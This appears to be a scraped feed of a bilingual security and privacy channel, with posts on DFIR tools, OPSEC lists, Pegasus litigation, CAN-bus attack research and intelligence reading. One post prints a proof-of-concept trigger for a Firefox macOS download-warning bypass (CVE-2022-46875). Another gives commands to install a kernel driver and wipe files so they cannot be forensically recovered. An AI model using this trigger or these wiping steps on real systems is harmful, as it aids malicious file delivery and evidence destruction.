#p2p #overlay
2023-01-13 00:22:39
🛡IPv8 - как там с лицом, IPv6?🛡IPv8 - how is it with the face, IPv6?#security #privacy #network #anonymity #p2p #overlay
2023-01-11 13:34:14
🔥CVE-2022-46875 + PoC(only trigger without exploit)Уязвимость была найдена в Firefox на macOS(другие ОС не затрагивает) при загрузке файлов .atloc и .ftploc(в macOS эквивалентны исполняемым файлам) не происходит отображение предупреждение об исполняемом файле, чем может воспользоваться злоумышленник, получая возможность при удачной эксплуатации - запустить вредоносные команды на машине жертвы. То есть Firefox обрабатывает данные расширения файлов таким образом, что злоумышленник может обойти предупреждение о том, что файл опасный и тем самым выдавая их за "белых и пушистых"(защита не срабатывает на .ftploc и .atloc, в то же время на .interloc она срабатывает).⚠️Уязвимость была исправлена в Firefox 108.Vulnerability was found in Firefox on macOS (does not affect other OS) when downloading .atloc and .ftploc (equivalent to executable files in macOS) does not display a warning about the executable file, which can be used by an attacker, getting the opportunity, if successfully exploited, to run malicious commands on the victim's machine. That is, Firefox processes file extension data in such a way that an attacker can bypass the warning that the file is dangerous and thereby passing them off as "white and fluffy" (protection does not work on .ftploc and .atloc, at the same time on .interloc it is triggered).⚠️Уязвимость была исправлена в Firefox 108.🔖PoC для .ftploc довольно простой / PoC for .ftploc is pretty simple:<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"> <dict> <key>URL</key> <string>FiLe:////////////////////////System/Applications/Calculator.app</string> </dict></plist>
2023-01-11 12:50:17
🛡Базовый список инструментов/решений/ОС/ресурсов для обеспечения приватности в сети(OPSEC), не нужно считать как исчерпывающий, для начинающих - вполне себе.🛡 The basic list of tools/solutions/OS/resources for ensuring privacy on the network (OPSEC), do not need to be considered as exhaustive, for beginners - quite yourself.#security #privacy #OS #tor #browser #cryptography #wipeData #VM #VPN #Proxy
2023-01-10 15:52:53
#NSO #PegasusSpyware #USA #Meta #Facebook #WhatsApp
2023-01-10 15:52:44
📰Опять NSO и его детище в лице Пегасуса. Сегодня верховный суд США отклонил дело(ранее поданную апелляцию от NSO), тем самым переместив дело в апелляционный суд США, ранее подавалось в суды низшей инстанции. По сути там было обращение от NSO в суд с целью отклонения иска от Facebook(в т.ч. и дочерняя компания WhatsApp) по причине того, что NSO эксплуатировали 0-day в WhatsApp для заражения Пегасусом примерно 1400 смартфонов, принадлежащих адвокатам, журналистам, правозащитникам, политическим диссидентам, дипломатам и другим высокопоставленным чиновникам.Причем решение Верховного суда открывает дорогу для череды новых исков, которые были возбуждены жертвами Пегасуса.📕Ниже прикладываю отклонение (NSO_598.pdf)Хотя Meta неоднократно отказывалась предоставлять данные WhatsApp ПРЕСТУПНИКОВ правоохранительным органам, но NSO - крайние негодяи. Понятное дело, что Пегасус использовался, используется и будет использоваться для слежки за неугодными персонами в разных государствах, причем с наплевательским отношением к законности данных действий.🗒Помимо вышеописанного иска, есть еще юридическая записка, которая подается в апелляциях для помощи суду, предоставляя информацию или аргументы, полезные в судопроизводственном процессе(Amicus Brief), которую подал Генеральный солиситор США. Рекомендация была Верховному суду была простая и заключалась в не рассмотрении дела разработчиков spyware с пометкой: "NSO явно не имеет права на иммунитет здесь". Amicus Brief тоже прикладываю ниже(WhatsAppp CVSG.pdf).📰Again, the NSO and his brainchild in the person of Pegasus. Today, the U.S. Supreme Court dismissed the case (previously filed an appeal from the NSO), thereby moving the case to the U.S. Court of Appeals, previously filed in lower courts. In fact, there was an appeal from the NSO to the court in order to dismiss a claim from Facebook (including a subsidiary of WhatsApp) due to the fact that the NSO exploited 0-day in WhatsApp to infect about 1400 smartphones belonging to lawyers, journalists, human rights defenders, political dissidents, diplomats and other high-ranking officials with Pegasus.Moreover, the decision of the Supreme Court opens the way for a series of new lawsuits that were initiated by the victims of Pegasus.📕I attach the deviation below (NSO_598.pdf)Although Meta has repeatedly refused to provide WhatsApp data of CRIMINALS to law enforcement agencies, but NSO are extreme scoundrels. It is clear that Pegasus has been used, is being used and will be used to spy on undesirable persons in different states, and with a disregard for the legality of these actions.🗒In addition to the above-described lawsuit, there is also a legal note that is filed in appeals to assist the court by providing information or arguments useful in the judicial process (Amicus Brief), which was filed by the U.S. Solicitor General. The recommendation to the Supreme Court was simple and consisted in not considering the case of spyware developers with a note: "NSO clearly has no right to immunity here." I also attach the Amicus Brief below (WhatsAppp CVSG.pdf).#NSO #PegasusSpyware #USA #Meta #Facebook #WhatsApp
2023-01-10 15:52:35
#NSO #PegasusSpyware #USA #Meta #Facebook #WhatsApp
2023-01-10 14:07:44
|xwingswrt|🛡Кастомная OpenWRT fw, которую можно использовать для борьбы с цензурой(защита доступа в Интернет на национальном уровне).⚠️Важно! Данная fw основана на OpenWrt с английской(en) локализацией.Данная fw включает в себя следующее:💾Ядро Линкус 6.x💾Последняя версия OpenWrt💾Xray / V2Ray💾ShadowSocksR Plus+💾OpenClash💾AdGuard💾WireGuard💾ZeroTier🛡Custom OpenWRT fw, which can be used to combat censorship (protection of Internet access at the national level).⚠️Important! This fw is based on OpenWRT with en localization.This fw includes the following:💾Linux Kernel 6.x💾Latest OpenWrt💾Xray / V2Ray💾ShadowSocksR Plus+💾OpenClash💾AdGuard💾WireGuard💾ZeroTier#firmware #OpenWRT #AntiCensorship #WireGuard
2023-01-10 11:51:34
🕵️‍♂️Подборка инструментов для повышения анонимности и деанонимизации от подписчицы канала и просто хорошего человека(рекомендую подписаться).🕵️‍♂️A selection of tools for anonymization and de-anonymization from the subscriber of the channel and just a good person (I recommend subscribing).#anonymity #deanonymization #ISP #Lightning #Tor #Network #Kicksecure #Cryptocurrency #Browser #Biometrics
2023-01-10 00:01:37
💥1day link Private Shizo(fully free).
2023-01-09 20:41:33
🕵️‍♂️Espionage by Europeans 2010–2021. A Preliminary Review of Court Cases.#FOI #CIA #GRU #FSB #SVR #military #espionage #Intelligence #counterintelligence #Humint #Russia #China #Europe
2023-01-09 20:41:23
#FOI #CIA #GRU #FSB #SVR #military #espionage #Intelligence #counterintelligence #Humint #Russia #China #Europe
2023-01-09 20:32:17
|Meerkat|🕵️‍♂️Этот сурикат легко поместится на дискету(никаких DLL или скомпиленных компонентов), оставляя за собой крайне мало следов на анализируемой машине. Для чего этот сурикат, содержащий в себе PS модули(можно и свои писать/добавлять) пригоден? Для сбора артефактов с Windows машины без необходимости в предварительно обследованном эндпоинте/развернутого агента и дальнейшей загрузкой в SIEM(подробнее можно почитать тут).Поддерживаемые формы вывода: .csv, .json, .xml и другие(по умолчанию .csv).Собирает следующие данные(с сылками как эти данные сортировать и анализировать):💾Autoruns💾Сертификаты 💾Информация о машине(эндпоинте)💾DLLs💾DNS💾Драйвера💾Журналы событий💾Файлы💾Участники группы(Group members)💾Список MAC-адресов 💾Процессы💾Корзина💾Реестр💾Запланированные задачи💾Сервисы 💾Необычные общие ресурсы и разрешения 💾TCP-соединения 🕵️‍♂️This meerkat will easily fit on a floppy disk (no DLL or compiled components), leaving very few traces on the analyzed machine. Why is this meerkat containing PS modules (you can also write/add your own) suitable? To collect artifacts from a Windows machine without the need for a pre-examined endpoint/deployed agent and further uploading to SIEM (you can read more here).Supported output forms: .csv, .json, .xml and others (default is .csv).Collects the following data (with links to how to sort and analyze this data):💾 Autoruns💾 Certificates💾 Information about the machine(endpoint)💾 DLLs💾 DNS💾 Drivers💾 Event Logs💾 Files💾 Group members💾 List of MAC addresses💾 Processes💾 Recycle bin💾 Registry💾 Scheduled tasks💾 Services💾 Unusual shared resources and permissions💾 TCP connections#forensics #DFIR #artifacts #SIEM #PS
2023-01-09 20:32:09
#forensics #DFIR #artifacts #SIEM #PS
2023-01-09 17:29:32
📕CANflict: Exploiting Peripheral Conflicts for Data-Link Layer Attacks on Automotive Networks#automotive #CANattacks #expoitation #vulnerability #ECU
2023-01-09 17:28:54
|CANflict|🌐Данная работа демонстрирует новый подход для атак на канальном уровне протокола CAN, который используется в большом количестве наземных средств передвижения(в большей мере - автомобилестроение). Если ранее атаки производились на прикладном уровне и IDS без особого труда обнаруживали следы атаки, то канальные хоть и требуют физического доступа к CAN-шине, однако атаки в таком случае более скрытые и могут повлечь больше урона. Злоумышленник может воспользоваться данными наработками касательно уже известных уязвимостей в CAN-протоколе удаленно проводить атаки чтения/записи с удаленно скомпрометированного ECU на другой ECU в этой CAN-сети.Суть заключается в использовании полиглот-фреймов и конфликте пинов между периферийными устройствами МК, управлять CAN-трафиком на битовом уровне и байпассить правила протокола для осуществления атаки на скрытом канальном уровне против CAN(позволяя нам осуществлять манипуляции с CAN-шиной), причем используются периферийные устройства которые уже имеются в МК(немодифицированный) и по существу в атаках использует чисто программный подход. Более подробно можно почитать в работе. 📑Репозиторий проекта находится тут(библиотека AC для управления канальным уровнем шины на основе вышеописанных конфликтующих периферийных устройств, CAN-методы обработки битов для управления канальным уровнем CAN,реализации для различных платформ: SPI, UART, I2C и ADC, а также контремеры CAN на канальном уровне).🌐This work demonstrates a new approach for attacks at the channel level of the CAN protocol, which is used in a large number of ground vehicles (to a greater extent - the automotive industry). If earlier attacks were carried out at the application level and IDS easily detected traces of an attack, then channel attacks, although they require physical access to the CAN bus, however, attacks in this case are more hidden and can cause more damage. An attacker can take advantage of these developments regarding already known vulnerabilities in the CAN protocol to remotely conduct read/write attacks from a remotely compromised ECU to another ECU in this CAN network.The essence is to use polyglot frames and pin conflict between MC peripherals, manage CAN traffic at the bit level and bypass protocol rules to carry out an attack at the hidden channel level against CAN (allowing us to manipulate the CAN bus), and peripheral devices that are already available in the MC (unmodified) and software are used The system uses a purely programmatic approach in attacks. You can read more in the work. 📑The project repository is located here (AC library for managing the bus channel level based on the conflicting peripheral devices described above, CAN bit processing methods for managing the CAN channel level, implementations for various platforms: SPI, UART, I2C and ADC, as well as CAN counter-measures at the channel level).#automotive #CANattacks #expoitation #vulnerability #ECU
2023-01-09 17:28:46
#automotive #CANattacks #expoitation #vulnerability #ECU
2023-01-09 12:42:14
Вот, кстати!Если говорить именно о песочницах, а не о виртуальных контейнерах типа VMOS, X8 Sandbox и тд, то под понятием "песочница" подразумевается отдельный пользователь (user ID) на устройстве. Это стандартная функция системы Android. А чем вы настраиваете и управляете - особой разницы нет. Есть всем известные менеджеры "песочниц": Shelter, Island и его форк Insular. Есть менее известные варианты настройки песочного профиля, например Tasker-плагин SecureTask. Есть прошивки с предустановленным, но менее юзабильным, чем тот же Island, вариантом. Например CalyxOS и ряд стоковых прошивок. Ну и есть всякие корпоративные сервисы типа Miradore или Kaspersky, которые даже не запустятся, если вы им не отдадите свое гео и тд. После настройки "песочницы" менеджер вообще можно удалить, все будет работать и без него. Повторюсь - это стандартная функция операционной системы.Так вот, о песочницах с "полной изоляцией". На Android 13 (Calyx), в отличие от Android 12, есть, например, такая интересная фича: стандартный системный файловый менеджер AOSP имеет прямой доступ к данным песочницы. А конкретно к директориям Изображения, Документы и тд. По крайней мере в CalyxOS это имеет место быть. На других прошивках не проверял, не досуг пока. У других системных (а тем более установленных пользователем) приложений такой функции нет.Сделано ли это (как всегда) для блага пользователей, которым нужно шарить фоточки между профилями, нужно ли записать это в косяк разработчикам конкретной прошивки (в скором времени думаю будет ясно) - однако это во многом ослабляет (а в некоторых случаях вообще херит) изоляцию песочницы. Ну и заставило меня изобретать очередной велосипед.Поэтому говорить про "песочницу с полной изоляцией" можно только рассматривая комплекс мер, которые помимо установки и настройки песочницы включают в себя взаимодействие с другими приложениями, их разрешениями в системе, наличие Root-доступа в песочнице и так далее и тому подобное. С выходом каждой новой версии Android все сложнее обеспечивать контроль над системой. Все эти гугловские запреты на доступ к Сервису специальных возможностей, чтению уведомлений и даже к директориям приложений на общем накопителе с одной стороны вроде как направлены на усиление безопасности, а с другой вставляют охрененные палки в колеса этой самой безопасности, вынуждая пользователя полагаться на разработчика прошивки или рыть носом инфу по вариантам противодействия такой "заботе". А как показала практика, даже такие авторитетные проекты как Calyx грешат хуйней.
2023-01-06 19:11:56
📕Satellite Ground Segment: Applying the Cybersecurity Framework to Satellite Command and Control🛰Декабрьский межведомственный отчет(8401) от NIST про применение Cybersecurity Framework по отношению к наземному сегменту космических операций в ключе с C2(command and control) над спутниковыми шинами и пэйлоадами. В целом было интересно почитать про космическую кибер-экосистему.🛰December interagency report(8401) from NIST about the application of the Cybersecurity Framework in relation to the ground segment of space operations in the key with C2(command and control) over satellite buses and payloads.In general, it was interesting to read about the space cyber ecosystem.#Satellite #SpaceOps #security #C2 #criticalInfrastructure
2023-01-06 19:11:52
#Satellite #SpaceOps #security #C2 #criticalInfrastructure
2023-01-06 17:05:32
|AppSec Ezine|📰464rd EditionRelease Date: 06/01/2023pathonprojectgithub#ezine #appsec #infosec
2023-01-05 16:15:10
|CARPE Forensics - creating our own forensic infrastructure|🕵️‍♂️Relatively long ago, I came across this framework, which can be used to create infrastructure myself, because there are sources and there are modules for automated analysis right away (so now modules can work with large amounts of data, keyword search, string extraction and recombination of file fragments), but I repeatedly postponed its analysis, but how it turned out - in vain. After all, when I have the task of developing a modular tool again, or I am invited to take part in the study of artifacts, this project will be able to help, because, as I repeat, it is an automated system that integrates into the workflow without any problems and simplifies the process of researching / analyzing the machine.The architecture of the framework can be viewed in the photo, which I attach as always - above.There are two main components:1️⃣ Analysis of digital forensic images (using plaso and RDS) and extraction of artifacts.The artifacts obtained in the course of the work are used in the future as input data for processing big dates (more details below).2️⃣ Work (processing) with a big dateAfter the above-described analysis of images and extraction of artifacts, correlation analysis and indexing of strings takes place (carried out using the modules mentioned at the beginning) and subsequent storage in the database (graphical, time series and relational), then it is all visualized and the forensic specialist gets everything beautiful and conditionally on a platter.In the end, we can also get an analysis report.⚠️It is better to get acquainted with the modules(advanced modules) in the repository and in practice, because there are a lot of them and at the same time nothing prevents you from writing your own to solve certain tasks.Conclusion: a rather interesting, flexible and easily embedded framework, which may be of interest to both developers of predictive software, as well as researchers or employees of various services and, in general, predictive specialists.⚙️ You can find out how to build it here or download the build-ed one already here.🔖 Documentation is here.#DFIR #forensics #artifact #image #BigData
2023-01-05 16:15:03
|CARPE Forensics - создаем свою форензик-инфраструктуру|🕵️‍♂️Относительно давно мне на глаза попался данный фреймворк, который вполне себе можно использовать для создания инфры собственноручно, ведь исходники есть и сразу есть модули для автоматизированного анализа(так теперь модули могут работать с большими объемами данных, поиск по кейвордам, извлечение строк и рекомбинация фрагментов файлов), однако неоднократно откладывал его разбор, но как выяснилось - зря. Ведь, когда у меня опять встанет задача по разработке модульного инструмента или меня позовут принять участие в исследовании артефактов, то этот проект сможет помочь, ведь как еще раз повторюсь - это автоматизированная система, которая без особых проблем интегрируется в рабочий процесс и упрощает процесс исследования/анализа машины.Архитектуру фреймворка можно посмотреть на фото, которое прикладываю как всегда - выше.Есть две основные составляющие:1️⃣Анализ цифровых форензик-образов(с использованием plaso и RDS) и извлечение артефактов.Полученные в ходе работы артефакты используются в дальнейшем как входные данные для обработки биг даты(далее немного подробнее).2️⃣Работа(обработка) с биг датойПосле вышеописанного анализа образов и извлечения артефактов, происходит корреляционный анализ и индексация строк(осуществляются с помощью упомянутых в начале модулей) и последующее хранение в БД(графическая, временных рядов и реляционная), далее это все визуализируется и форензик-специалист получает все красивое и на условно на блюдечке.В конечном итоге можем получить и отчет анализа.⚠️С модулями(расширенные модули тут) лучше ознакомиться в репозитории и на практике, ибо их уйма и в то же время не ничего не мешает написать свои для решения определенных задач. Вывод: довольно интересный, гибкий и легковстраиваемый фреймворк, который может быть интересен, как разработчиками форензик-софта, так и исследователям или сотрудникам различных служб и в целом форензик-специалистам. ⚙️Как сбилдить можно узнать тут или загрузить собранный уже тут.🔖Документация тут.#DFIR #forensics #artifact #image #BigData
2023-01-05 16:14:54
🕵️‍♂️CARPE Forensics - создаем свою форензик-инфраструктуру🕵️‍♂️CARPE Forensics - creating our own forensic infrastructure#DFIR #forensics #artifact #image #BigData
2023-01-04 19:31:06
|Terrorist Threat Intelligence|🕵️‍♂️Проблема с терроризмом распласталась по миру, а поиск террористов(нет, не сфабрикованные дела с "клавишными" террористами) не простой, на start.me появилась недавно подборка с ресурсами для разведки террористических угроз. Содержимое:💾Глобальный индекс терроризма 💾Открытые санкции💾Новости из области терроризма/экстремизма 💾Базельский индекс борьбы с отмыванием денег(AML)💾Соответствие требованиям и надлежащая разведка💾Активные террористические группы💾Ресурсы, помогающие при "террористической" разведке💾Разведка, направленная на получение информации об оружии.🕵️‍♂️The problem with terrorism has spread all over the world, and the search for terrorists (no, not fabricated cases with "keyboard" terrorists) is not easy, on start.me a selection of resources for the intelligence of terrorist threats has recently appeared.Content:💾Global terrorism index💾Open Sanctions 💾Terrorism/Extremism news💾Basel AML index💾Compliance & due intelligence 💾Terrorism intelligence resources💾Active terrorist groups💾Weapons intelligence #Intelligence #Terrorism #Extremism #OSINT #Weapons
2023-01-04 19:30:50
#Intelligence #Terrorism #Extremism #OSINT #Weapons
2023-01-04 14:51:30
|AppSec Ezine|📰463rd 🎄 EditionRelease Date: 30/12/2022pathonprojectgithub#ezine #appsec #infosec
2023-01-04 14:47:53
|UNREDACTED Magazine #001| 🤙Шизо жив! 📘Тут появился первый выпуск журнала от Майкла Баззелл, который проработал примерно 18 лет в должности государственного следователя по компьютерным преступлениям, причём на ФБР. У него есть две работы, с которыми скорее…
2022-12-31 13:01:07
🎄Дорогие подписчики! Хочу пожелать в новом году всего наилучшего, пусть работа приносит удовольствие и интересные задачи, надеюсь что в 2023-м году поставленные планы будут выполнены, новый материал будет легко усваивать, да и в целом чтобы в семье было все хорошо. Этот год был непростым, но довольно насыщенным на события, для кого-то он был слишком тяжелым и хочется, чтобы как минимум был не хуже, а в идеале - лучше.🎄Dear subscribers! I want to wish you all the best in the new year, let the work bring pleasure and interesting tasks, I hope that in 2023 the plans will be fulfilled, the new material will be easy to learn, and in general, everything will be fine in the family. This year was not easy, but it was quite eventful, for someone it was too hard and I want it to be at least not worse, and ideally better.
2022-12-29 01:31:44
|Improving the Intelligence Community's Leveraging of the Full Science and Technology Ecosystem|🕵️‍♂️Ни для кого не секрет, что успех разведывательного сообщества (Intelligence Community, IC) не мало зависит от опережения противника в техническом аспекте. Данная работа рассматривает способы/методы, благодаря которым IC сможет воспользоваться передовыми достижениями науки и техники для создания современной экосистемы исследований и разработок. Да, это все довольно трудно, однако при пренебрежении такого потенциала не получится поставить противника в ступор.Подробнее можно ознакомиться с рекомендациями в работе. #Intelligence #science #research #development
2022-12-29 01:31:23
|Improving the Intelligence Community's Leveraging of the Full Science and Technology Ecosystem|🕵️‍♂️It's no secret that the success of the Intelligence Community (IC) does not depend a little on the advance of the enemy in the technical aspect. This paper examines the ways/methods by which IC will be able to take advantage of the advanced achievements of science and technology to create a modern ecosystem of research and development. Yes, it's all quite difficult, but if such a potential is neglected, it will not be possible to put the enemy in a stupor.You can read more about the recommendations in the work.#Intelligence #science #research #development
2022-12-28 20:59:13
🤙Выражаю огромную благодарность Pavlu, ведь благодаря нему и авторам журнала(Шизо тоже приложил руку) вышло сие творчество. По возможности поддержите старания(просто подписаться или поделиться со знакомым/приятелем/другом), тебе дорогой подписчик или странствующий читатель - не трудно, а нам приятно!В первом, пилотном выпуске, вас ждут статьи из рубрик: Darknet Review, Tor-метрика, Шизофреническая анонимность, Уголок Кодера, 420 Stoners Сlub и Ооо! Нейролингвистическое.
2022-12-28 20:43:26
Участники | Поддержать
2022-12-28 20:21:39
#software #search Pinpoint[ journaliststudio.google.com/pinpoint/ ]Еще один великолепный инструмент для сбора, агрегации в многообразие всей той информации которую вы уже собрали в процессе собственных исследований.Помните Datashare? [t.me/forensictools/372]Так вот - Pinpoint его аналог, только облачный и от Google, с добавленными крутыми фишками, работающие на базе искусственного интеллекта, как заявляют авторы. Основная суть такая же - позволять искать нужную информацию и фактоиды из всей той разнотипной информации которую вы собрали по делу. Но из особенностей можно выделить следующее: • Распознание текста (даже рукописного) на фото, картинках, сканах, pdf. При этом текст на изображение может быть совершенно не подготовлен для подобных операций (например на отдаленной вывеске снятой под углом, или надписи присутствующей на каком то объекте изображенном на фото) • Расшифровка аудио/видео записей в текст с указанием тайминга и поиском по нему. • Распознание таблиц в изображениях и перевод их в редактируемый вид. • Автоматическая идентификация имен, названий организаций, географических точек исходя из базы знаний Google.P.S. Я реально, в лютом восторге от его возможностей по распознанию текста на фото. Никогда еще не видел чтоб это было в таком качестве.
2022-12-28 01:41:01
|ANTfs - restore or prevent recovery|"And what is there on anti-forensis, and then there are a lot of posts on forensis lately?"🕵️‍♂️In general, I have not observed any really new/breakthrough solutions or techniques recently (what is used in the ransom community is essentially old techniques, with rare exceptions), although there is one interesting project that I will try to analyze in more detail in the near future - Shufflecake (sources, introductory post and work).Quite a few projects/techniques/developments in general are in private - for obvious reasons, although in this case errors and vulnerabilities are more difficult to track.Today's test subject is ANTfs. This project is based on the manipulation of the FS(filesystem) to prevent recovery (not concealment!) files using the Windows driver (application in kernel-mode). That is, the recording files are overwritten and the contents of the file are erased by itself. Using the driver, you can bypass direct write blocking by setting SL_FORCE_OVERWRITE inside IRP flags and sending a Write request to a lower-level driver.In fact, the project consists of a user-mode application (ANTfs.exe ) and ANTfs drivers(kernel-mode application, ANTfsDriver.sys ). If the second plus or minus is sorted out, then the user-mode application is used to restore deleted files from the system and outputs them to the timestamped directory (if you do not specify the path, it will be created in the same directory). It works clearly: 💾a volume descriptor is being created💾next comes the reading from the MFT(examples of MFT parsers: MFTECmd, MFT_Browser and Analyze MFT) 💾iterating over each file entry in the MFT(s), checking the allocation bit💾If the record is not distributed, it is processed.The user can restore data from the system, but in order to erase it, you will need the driver described earlier.⚠️The contents of the basket are ignored!To erase a record from the system, you first need to install the driver:sc create antfs binPath= <path/to/driver>/antfs driver.sys type= kernelsc start antfsUse the following commands to perform the previously described actions.⚙️Recovery of deleted files(--recover) from volume D(--drive d indicating the output path of saving the timestamped directory),--outfile path(if we want to save it there, then after the --outfile argument we don't need to write anything):ANTfs.exe --drive d --recover --outfile E:\ShizoForensics⚙️To erase the record from the system, use the following command (the --wipe argument to clear the record from the file):ANTfs.exe --drive c --wipe file_to deleteSumming up, I would like to say that although the project is no longer supported, but it works quite well despite the use of the driver (in principle, not bad), for those who are really interested in using the project, I advise you to look at the generated artifacts in the process of work (not a big homework assignment).#antiForensics #forensics #fileSystem #NTFS #MFT
2022-12-28 01:40:47
|ANTfs - восстанавливай или предотвращай восстановление|"А что там по анти-форензике, а то много постов по форензике в последнее время?"🕵️‍♂️В целом действительно новых/прорывных решений или техник не наблюдал в последнее время(то, что используется в рансом сообществе - по сути старые техники, за редким исключением), хотя есть один интересный проект, который постараюсь подробнее разобрать в скором - Shufflecake(исходники, вводный пост и работа).Не мало проектов/техник/наработок в целом находятся в привате - по понятным причинам, хотя в таком случае ошибки и уязвимости труднее отслеживать.Сегодняшний подопытный - ANTfs. Данный проект основывается на манипулировании ФС для предотвращения восстановления(не сокрытия!) файлов, используя драйвер Windows(приложение в режиме ядра, kernel-mode). То бишь происходит перезапись файлов записи и само собой содержимое файла стирается. С помощью драйвера можно обойти блокировку прямой записи, установив SL_FORCE_OVERWRITE внутри IRP-флагов и отправив Write-запрос нижестоящему драйверу.По сути проект состоит из user-mode приложения(ANTfs.exe) и ANTfs драйвера(kernel-mode приложение, ANTfsDriver.sys). Если со вторым плюс-минус разобрались, то user-mode приложение используется для восстановления удаленных файлов из системы и выводит их в timestamped каталог(если не указать путь, то будет создан в том же каталоге). Работает понятно: 💾создается дескриптор для тома💾далее происходит чтение из MFT(примеры MFT-парсеров:MFTECmd, MFT_Browser и Analyze MFT) 💾итерирование по каждой файловой записи в MFT(ах), проверяя бит выделения💾В случае, если запись не распределена, происходит её обработка.💾Пользователь может восстановить данные из системы, но вот для того чтобы стереть понадобится описанный ранее драйвер.⚠️Содержимое корзины игнорируется!⚠️Для стирания записи из системы предварительно нужно установить драйвер:sc create antfs binPath= <путь/до/драйвера>/antfs driver.sys type= kernelsc start antfsС помощью следующих команд выполнить ранее описанные действия.⚙️Восстановление удаленных файлов(--recover) из тома D(--drive d с указанием выходного пути сохранения timestamped каталога(--outfile путь, если мы хотим сохранить там же, то после аргумента --outfile не нужно ничего писать ):ANTfs.exe --drive d --recover --outfile E:\ShizoForensics⚙️Для стирания записи из системы воспользуемся следующей командой(аргумент --wipe для очистки записи из файла):ANTfs.exe --drive c --wipe файл_для_удаленияПодводя итоги хочется сказать, что хоть и проект уже не поддерживается, но он довольно хорошо работает несмотря на использование драйвера(в принципе не плохо), для тех кто действительно заинтересован в использовании проекта, советую посмотреть на генерируемые артефакты в процессе работы(не большое домашнее задание).#antiForensics #forensics #fileSystem #NTFS
2022-12-28 01:40:36
💥ANTfs - восстанавливай или предотвращай восстановление.💥ANTfs - restore or prevent recovery.#antiForensics #forensics #fileSystem #NTFS
2022-12-25 15:30:49
🔥🔥🔥Cinema time!Agenda:💾Video decoding subsystem overview💾AppleAVD internals💾AppleAVD attack surface💾Fuzzing approach and code analysis💾Results💾Previously disclosed vulnerabilities and exploitation💾Discussion💾Q&A
2022-12-25 15:13:59
🕵️‍♂️Studies in Intelligence 66, No. 4#CIA #FBI #KGB #Intelligence #Counterspy #InsiderThreats #COVID19 #KineticPredictiveAnalyticTechnique #WWII #Russia #USSR #Vatican #NorthKorea #Japan #Italia #Africa
2022-12-25 15:13:22
|Studies in Intelligence 66, No. 4|🕵️‍♂️Вышел новый выпуск журнала для разведчиков: "Studies in Intelligence(Исследования в области Разведки)". Вкратце что за журнал можно почитать тут.📕Содержание журнала:📑Инсайдерские угрозы:Выявление трещин:Влияние пандемии COVID-19 на организационное правосудие в IC📑Борьба с Неожиданностью: Представляем методику кинетического прогностического анализа Криса Батчелдера📑Жизнь и неправомерная смерть Грегга Дэвида Венцеля, тайного сотрудника ЦРУ(Звезда 81)📑Почему Демократии развиваются и приходят в упадок📑Путин - Рецензия Дж. Э. Леонардсона📑Оружие, партизаны и великий лидер: Северная Корея и Третий мир📑КГБ и Ватикан: секреты досье Митрохина📑Первый контрразведчик: Ларри Хаас, Bell Aircraft и попытка ФБР поймать советского "крота"📑"Мост к Солнцу": тайная роль американцев японского происхождения, сражавшихся на Тихом океане во Второй Мировой Войне📑“Vincere!”(победа). Операции итальянской королевской армии по борьбе с повстанцами в Африке, 1922-1940📑Книжная полка офицера разведки - декабрь 2022 года📑СМИ , рассмотренные в исследованиях по разведке в 2022 году🕵️‍♂️A new issue of the magazine for intelligence officers has been published: "Studies in Intelligence ". In short, what kind of magazine can you read here.📕Contents of the magazine:📑Insider Threats:Exposing the Cracks:Impact of the COVID-19 Pandemic on Organizational Justice in the IC📑Combating Surprise: Introducing the Kinetic Predictive Analytic Technique by Chris Batchelder📑The Life and Wrongful Death of Gregg David Wenzel, Clandestine CIA Officer Star 81📑Why Democracies Develop and Decline📑Putin—Reviewed by J.E. Leonardson📑Guns, Guerillas, and the Great Leader: North Korea and the Third World📑The KGB and the Vatican: Secrets of the Mitrokhin Files📑The First Counterspy: Larry Haas, Bell Aircraft, and the FBI’s Attempt to Capture a Soviet Mole📑Bridge to the Sun: The Secret Role of the Japanese Americans Who Fought in the Pacific in World War II📑“Vincere!” The Italian Royal Army’s Counterinsurgency Operations in Africa, 1922–1940📑Intelligence Officer’s Bookshelf—December 2022📑Media Reviewed in Studies in Intelligence in 2022#CIA #FBI #KGB #Intelligence #Counterspy #InsiderThreats #COVID19 #KineticPredictiveAnalyticTechnique #WWII #Russia #USSR #Vatican #NorthKorea #Japan #Italia #Africa
2022-12-25 15:13:07
#CIA #FBI #KGB #Intelligence #Counterspy #InsiderThreats #COVID19 #KineticPredictiveAnalyticTechnique #WWII #Russia #USSR #Vatican #NorthKorea #Japan #Italia #Africa
2022-12-24 15:15:12
💥1day link Private Shizo(fully free)
2022-12-23 13:13:09
😉В преддверии нового года, хочется пожелать именно тебе, чтобы новогоднее настроение напитывало тебя силами и приятными эмоциями. Пусть выходные подарят отличный отдых и гору улыбок.😉On the eve of the new year, I would like to wish you that the New Year mood nourishes you with strength and pleasant emotions. Let the weekend give you a great rest and a mountain of smiles.
2022-12-23 13:03:47
📕Demystifying Bitcoin Address Behavior via Graph Neural Networks#cryptocurrency #BTC #forensics #NeuralNetwork
2022-12-23 13:03:42
#cryptocurrency #BTC #forensics #NeuralNetwork
2022-12-23 11:00:10
|AppSec Ezine|📰462rd 🎄 EditionRelease Date: 23/12/2022pathonprojectgithub#ezine #appsec #infosec
2022-12-23 10:32:30
|Форензика против контрфорензики|🕵️‍♂️Данная работа позволяет по-современному взглянуть на форензик-экспертизу, получая информацию от основ форензик-экспертизы, в том числе: процесс судебного расследования, цепочка поставок и структура киберпреступлений, какие цифровые данные полезны для форензик-специалиста и какие есть типы следователей, а также какие возникают трудности в ходе экспертизы и инструментарий для получения артефактов из различных источников. Немало материала посвящено контрмерам цифровой криминалистике(anti-forensics) и соответственно затронута тема anti-anti-forensics.Так что данную работу рекомендую как начинающим/среднего уровня форензик-специалистам, так и тем, кто подозревает что могут его цифровой носитель подвергнуть криминалистическому анализу.#security #privacy #forensics #antiForensics #AntiAntiForensics
2022-12-23 10:29:01
#security #privacy #forensics #antiForensics #AntiAntiForensics
2022-12-23 10:05:48
